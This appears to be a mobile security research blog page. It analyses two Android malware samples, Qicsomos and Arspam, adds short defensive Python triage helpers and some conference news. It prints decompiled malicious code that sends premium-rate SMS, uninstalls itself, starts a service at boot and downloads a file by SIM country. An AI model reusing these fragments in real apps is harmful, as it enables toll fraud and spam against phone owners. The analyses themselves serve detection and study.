New Mobile-Sandbox-System

Over the last few weeks we did a lot of research and development in the field of mobile malware analysis. As a result, the new and improved Mobile-Sandbox is now online. Over the next few weeks we will be implementing some more features, so stay tuned!

–> Mobile-Sandbox.com

Detailed Analysis of Android.Qicsomos

Intro: What is Android.Qicsomos?

Android.Qicsomos is a new Android malware that emerged some days ago. It sends SMS messages to premium-rate numbers.

Analysis of the Application and Its Structure

The app requests the following permissions:

  • android.permission.READ_LOGS
  • android.permission.SEND_SMS

After the application has been installed successfully, the icon of the app shows up in the dashboard. The name of the application and the UI look like an app for detecting CarrierIQ.

The Malicious Parts:

The malicious part of the app starts when a user hits the “Déinstaller” button. The app sends four SMS messages to “81168” containing the texts “AT37”, “MC49”, “SP99” and “SP93” before it is uninstalled (for more information see the following code-snippet).

// Decompiler output: the labelN: markers are artifacts of the decompiler, not part of the source.
// Four hard-coded SMS messages are sent to the short code 81168, one per nested try block,
// so a failure of one send does not prevent the following ones.
localSmsManager.sendTextMessage("81168", null, "AT37", null, null);
try{
    label15: localSmsManager.sendTextMessage("81168", null, "MC49", null, null);
    try{
        label26: localSmsManager.sendTextMessage("81168", null, "SP99", null, null);
        try{
            label37: localSmsManager.sendTextMessage("81168", null, "SP93", null, null);
            // Only after the messages are out does the app fire the DELETE intent that uninstalls
            // the package it is installed as (the fake CarrierIQ detector).
            label48: Intent localIntent = new Intent("android.intent.action.DELETE", Uri.parse("package:org.projectvoodoo.simplecarrieriqdetector"));
...
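A small static-triage helper for decompiled output like the fragment above: it pulls every sendTextMessage call with hard-coded arguments, groups them by destination and flags destinations that look like premium-rate short codes. This is an added example, not code from Mobile-Sandbox; the embedded input is the Qicsomos fragment quoted above, and the short-code length range is a heuristic assumption.

```python
from __future__ import annotations
import re

# Constructed input: the decompiled Qicsomos fragment from the analysis above.
DECOMPILED_SNIPPET = """
localSmsManager.sendTextMessage("81168", null, "AT37", null, null);
try{
    label15: localSmsManager.sendTextMessage("81168", null, "MC49", null, null);
    try{
        label26: localSmsManager.sendTextMessage("81168", null, "SP99", null, null);
        try{
            label37: localSmsManager.sendTextMessage("81168", null, "SP93", null, null);
            label48: Intent localIntent = new Intent("android.intent.action.DELETE", Uri.parse("package:org.projectvoodoo.simplecarrieriqdetector"));
"""

# SmsManager.sendTextMessage(destinationAddress, scAddress, text, sentIntent, deliveryIntent).
# Only calls whose destination and text are string literals are matched: those are the
# hard-coded premium sends a reviewer wants to see first.
SEND_SMS_RE = re.compile(
    r'sendTextMessage\(\s*"(?P<dest>[^"]*)"\s*,\s*[^,]*,\s*"(?P<text>[^"]*)"'
)


def extract_hardcoded_sms(source: str) -> list[tuple[str, str]]:
    """Return (destination, text) for every sendTextMessage call with literal arguments."""
    return [(m.group("dest"), m.group("text")) for m in SEND_SMS_RE.finditer(source)]


def is_short_code(number: str) -> bool:
    """Heuristic (assumption): premium SMS services are addressed by 3 to 6 digit short codes."""
    return number.isdigit() and 3 <= len(number) <= 6


def triage(source: str) -> dict:
    """Group hard-coded sends by destination and flag short-code destinations and self-uninstall."""
    by_dest: dict[str, list[str]] = {}
    for dest, text in extract_hardcoded_sms(source):
        by_dest.setdefault(dest, []).append(text)
    return {
        "short_code_destinations": {d: t for d, t in by_dest.items() if is_short_code(d)},
        "other_destinations": {d: t for d, t in by_dest.items() if not is_short_code(d)},
        "fires_delete_intent": "android.intent.action.DELETE" in source,
    }


if __name__ == "__main__":
    for dest, texts in triage(DECOMPILED_SNIPPET)["short_code_destinations"].items():
        print(f"{len(texts)} hard-coded SMS to short code {dest}: {texts}")
```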

Sample Information:

sha256:
79a3bc6da45243355a920082dc67da0febf19379c25c721c43fd6b3f83ff4ef4

md5:
69b9691a8274a17cdc22e9681b3e1c74

Mobile-Sandbox Report

8th Annual IFIP WG11.9 International Conference on Digital Forensics

We published and presented the paper “Forensic Acquisition of Location Data from Android Smartphones” at the IFIP WG11.9 conference in January this year. This paper covers the forensic acquisition of location data from Android smartphones (system and applications) and the corresponding generation of movement profiles. It will be published in the upcoming edition of “Advances in Digital Forensics”.

Paper accepted!

Today we got the great news that two of our papers, “Analyse und Vergleich von BckR2D2-I und II” and “Forensic Analysis of YAFFS2”, have been accepted for Sicherheit2012 in Darmstadt.

We are really looking forward to participating.

Detailed Analysis of Android.Arspam

Intro: What is Android.Arspam?

Android.Arspam is a new Android malware threat that emerged some days ago. It uses a trojanised version of an Islamic compass application to distribute political propaganda links. This malware represents the first stage of politically-motivated hacking (hacktivism) on mobile platforms.

Analysis of the Application and Its Structure

The app requests the following permissions:

  • android.permission.INTERNET
  • android.permission.ACCESS_FINE_LOCATION
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.INTERNET
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.READ_CONTACTS
  • android.permission.CHANGE_WIFI_MULTICAST_STATE
  • android.permission.CLEAR_APP_USER_DATA
  • android.permission.BIND_INPUT_METHOD
  • android.permission.WRITE_CONTACTS
  • android.permission.CLEAR_APP_CACHE
  • android.permission.AUTHENTICATE_ACCOUNTS
  • android.permission.READ_PHONE_STATE
  • android.permission.SET_PREFERRED_APPLICATIONS
  • android.permission.INTERNAL_SYSTEM_WINDOW
  • android.permission.MANAGE_ACCOUNTS
  • android.permission.PERSISTENT_ACTIVITY
  • android.permission.FLASHLIGHT
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.ACCESS_MOCK_LOCATION
  • android.permission.SEND_SMS
  • android.permission.HARDWARE_TEST
  • android.permission.ACCESS_CHECKIN_PROPERTIES
  • android.permission.DISABLE_KEYGUARD
  • android.permission.READ_SYNC_STATS
  • android.permission.READ_INPUT_STATE
  • android.permission.EXPAND_STATUS_BAR
  • android.permission.BLUETOOTH
  • android.permission.BIND_APPWIDGET
  • android.permission.ACCESS_LOCATION_EXTRA_COMMANDS
  • android.permission.BROADCAST_SMS
  • android.permission.DIAGNOSTIC
  • android.permission.BLUETOOTH_ADMIN
  • android.permission.DEVICE_POWER
  • android.permission.CHANGE_CONFIGURATION
  • android.permission.DELETE_PACKAGES
  • android.permission.BROADCAST_WAP_PUSH
  • android.permission.REBOOT
  • android.permission.WRITE_SMS
  • android.permission.ACCESS_WIFI_STATE
  • android.permission.ACCESS_COARSE_LOCATION
  • android.permission.STATUS_BAR
  • android.permission.MOUNT_UNMOUNT_FILESYSTEMS
  • android.permission.GLOBAL_SEARCH
  • android.permission.READ_SMS
  • android.permission.CONTROL_LOCATION_UPDATES
  • android.permission.MANAGE_APP_TOKENS
  • android.permission.DELETE_CACHE_FILES
  • android.permission.BATTERY_STATS
  • android.permission.READ_SYNC_SETTINGS
  • android.permission.SET_TIME_ZONE
  • com.android.browser.permission.READ_HISTORY_BOOKMARKS
  • android.permission.MOUNT_FORMAT_FILESYSTEMS
  • android.permission.SIGNAL_PERSISTENT_PROCESSES
  • android.permission.MASTER_CLEAR
  • android.permission.READ_LOGS
  • android.permission.BRICK
  • android.permission.SET_ACTIVITY_WATCHER
  • android.permission.RECEIVE_SMS
  • android.permission.GET_ACCOUNTS
  • android.permission.CALL_PHONE
  • android.permission.READ_CONTACTS
  • android.permission.RESTART_PACKAGES
  • android.permission.READ_CALENDAR
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.CAMERA
  • android.permission.ACCESS_FINE_LOCATION
  • android.permission.SUBSCRIBED_FEEDS_READ
  • android.permission.WAKE_LOCK
  • android.permission.RECORD_AUDIO
  • android.permission.INSTALL_PACKAGES
  • android.permission.INJECT_EVENTS
  • android.permission.RECEIVE_WAP_PUSH
  • android.permission.USE_CREDENTIALS
  • android.permission.ACCOUNT_MANAGER
  • android.permission.SET_ALWAYS_FINISH
  • android.permission.RECEIVE_MMS
  • android.permission.WRITE_SECURE_SETTINGS
  • android.permission.MODIFY_AUDIO_SETTINGS
  • android.permission.WRITE_CALENDAR
  • android.permission.WRITE_SYNC_SETTINGS
  • android.permission.INSTALL_LOCATION_PROVIDER
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.MODIFY_PHONE_STATE
  • android.permission.WRITE_SETTINGS
  • android.permission.INTERNET
  • android.permission.ACCESS_SURFACE_FLINGER
  • android.permission.CHANGE_NETWORK_STATE
  • android.permission.CALL_PRIVILEGED
  • android.permission.CHANGE_COMPONENT_ENABLED_STATE
  • android.permission.DUMP
  • android.permission.SET_WALLPAPER
  • android.permission.GET_TASKS
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.PROCESS_OUTGOING_CALLS
  • android.permission.WRITE_OWNER_DATA
  • android.permission.WRITE_GSERVICES
  • android.permission.SET_WALLPAPER_HINTS
  • android.permission.BROADCAST_STICKY
  • android.permission.READ_FRAME_BUFFER
  • android.permission.GET_PACKAGE_SIZE
  • android.permission.FORCE_BACK
  • android.permission.UPDATE_DEVICE_STATS
  • android.permission.WRITE_APN_SETTINGS
  • android.permission.BROADCAST_PACKAGE_REMOVED
  • android.permission.SET_ANIMATION_SCALE
  • android.permission.SET_ORIENTATION
  • android.permission.SET_DEBUG_APP
  • android.permission.FACTORY_TEST
  • android.permission.REORDER_TASKS
  • android.permission.SET_PROCESS_LIMIT
  • android.permission.READ_OWNER_DATA
  • android.permission.CHANGE_WIFI_STATE
  • android.permission.VIBRATE
  • android.permission.SUBSCRIBED_FEEDS_WRITE
  • android.permission.RECEIVE_BOOT_COMPLETED
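A manifest permission triage helper, added here as an example and not part of Mobile-Sandbox: it deduplicates a requested permission list (the Arspam manifest repeats several entries), reports permissions a normal third-party app has no business requesting, and matches permission combinations to the behaviours analysed on this page (the boot receiver that starts an SMS-to-all-contacts service, and the premium SMS sending of Qicsomos). The privileged-permission set and the rule names are my own assumptions; the inputs are subsets of the two samples' permission lists above.

```python
from __future__ import annotations

# Constructed inputs: subsets of the permission lists quoted in the two analyses on this page.
ARSPAM_PERMISSIONS = [
    "android.permission.INTERNET", "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.INTERNET", "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.READ_CONTACTS", "android.permission.SEND_SMS",
    "android.permission.INSTALL_PACKAGES", "android.permission.BRICK",
    "android.permission.READ_CONTACTS", "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.READ_PHONE_STATE",
]
QICSOMOS_PERMISSIONS = ["android.permission.READ_LOGS", "android.permission.SEND_SMS"]

# Assumption: a hand-picked set of permissions that are reserved for system/signature apps;
# a third-party manifest requesting them is a red flag in itself, whether or not they are granted.
PRIVILEGED = {
    "android.permission.INSTALL_PACKAGES", "android.permission.DELETE_PACKAGES",
    "android.permission.BRICK", "android.permission.MASTER_CLEAR",
    "android.permission.REBOOT", "android.permission.INJECT_EVENTS",
}

# Behaviour rules as permission sets. "sms_contact_worm" is exactly the capability combination
# Arspam uses (boot receiver -> service -> SMS to every contact); "send_sms" alone is the
# Qicsomos premium-SMS case, which needs nothing but SEND_SMS.
RULES = {
    "sms_contact_worm": {"android.permission.SEND_SMS", "android.permission.READ_CONTACTS",
                         "android.permission.RECEIVE_BOOT_COMPLETED"},
    "send_sms": {"android.permission.SEND_SMS"},
    "download_to_sdcard": {"android.permission.INTERNET",
                           "android.permission.WRITE_EXTERNAL_STORAGE"},
}


def triage_permissions(requested: list[str]) -> dict:
    """Summarise a manifest's requested permissions: duplicates, privileged ones, matched rules."""
    perms = set(requested)
    return {
        "unique": len(perms),
        "duplicates": sorted(p for p in perms if requested.count(p) > 1),
        "privileged": sorted(perms & PRIVILEGED),
        "matched_rules": sorted(name for name, needed in RULES.items() if needed <= perms),
    }


if __name__ == "__main__":
    for label, perms in (("Arspam", ARSPAM_PERMISSIONS), ("Qicsomos", QICSOMOS_PERMISSIONS)):
        print(label, triage_permissions(perms))
```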

When the app has been installed successfully, the icon of the original app shows up in the dashboard. The UI and functionality have also been duplicated from the original app.

The malicious part of this application consists of the following two main classes, which are analyzed in detail below:

  • arRabi
  • alArabiyyah

Analysis of arRabi

This class is a broadcast receiver: it checks whether the received intent is the boot-completed broadcast and, if so, starts the malicious alArabiyyah service:

// Receiver entry point (decompiler output; the closing parenthesis of the condition was missing
// in the original listing). The service therefore starts on every boot without user interaction.
if ("android.intent.action.BOOT_COMPLETED".equals(paramIntent.getAction())) {
   paramContext.startService(new Intent(paramContext, alArabiyyah.class));
}

Analysis of alArabiyyah

This application starts a service called alArabiyyah, which sends an SMS to every contact in the address book with a link to one of 18 forum sites in the message.

Additionally, if the country code of the inserted SIM is Bahrain (“BH”), the application attempts to download a PDF file of the Bahrain Independent Commission of Inquiry report (see the following code-snippet).

// Decompiler output. Note that the decompiler rendered the country check as a reference
// comparison (==) on Strings; the stream and buffer variables are declared earlier in the
// (truncated) method. The file is written to the root of external storage.
if (((TelephonyManager)getSystemService("phone")).getSimCountryIso() == "BH"){
   URL localURL = new URL("http://www.alwasatnews.com/data/2011/3382/BICIreportAR.pdf");
   HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
   localHttpURLConnection.setRequestMethod("GET");
   localHttpURLConnection.setDoOutput(true);
   localHttpURLConnection.connect();
   File localFile1 = Environment.getExternalStorageDirectory();
   File localFile2 = new File(localFile1, "BICIreportAR.pdf");
   localFileOutputStream = new FileOutputStream(localFile2);
   localFile2.toString();
   localInputStream = localHttpURLConnection.getInputStream();
   localHttpURLConnection.getContentLength();
   arrayOfByte = new byte[1024];
}

Sample Information:

sha256:
1d22924bbe5dce7696e18d880482b63ce19ca0746f8671aaec865cce143f6e6f

md5:
e7584031896cb9485d487c355ba5e545

Mobile-Sandbox Report